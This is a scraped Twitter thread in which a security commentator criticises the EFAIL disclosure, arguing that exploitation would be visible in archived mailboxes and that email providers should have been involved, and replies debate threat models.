Most of us archive our entire history of email. The efail team could have released scripts that review your mailbox for signs of exploitation. Don't you think an img tag wrapping the multipart header would stick out a bit? Even the CFB/CBC gadget is discoverable after decrypting.
-
-
Show this thread
-
I also don't see any attempt to coordinate with major MTAs (e.g., Google or Microsoft). MTAs could have set up detections for direct exploitation and, likely, reviewed everyone's mailboxes for already delivered mail.pic.twitter.com/26SojYl2xb
Show this thread -
Don't confuse my distaste for the disclosure with advocacy for S/MIME, PGP, or encrypted email. You should: 1) use authenticated cryptography ffs! 2) stop using email and start using Signal if you need privacy
Show this thread
End of conversation
New conversation -
-
-
Can I borrow "intellectually neat, operationally stupid"?
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Ransomware is obvious after you’ve been hit too but that doesn’t make it not a serious threat.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
It’s not only about man-in-the-middle attacks to catch-modify-release mails. If a three-letter-agency gets access to your mailbox (which is what they do), they can easily hide their traces after they presented you a modified email.
-
And that one mail can contain thousands of encrypted messages in multiple mime parts prepared to be exfiltrated. Plus something irrelevant on top
End of conversation
New conversation -
-
-
Doesn't that depend on the value of the information? A financial attacker wouldn't care. But a nation state targeting Snowden... (luckily I don't consider myself that interesting ;-)
-
of course, threat models always matter
End of conversation
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.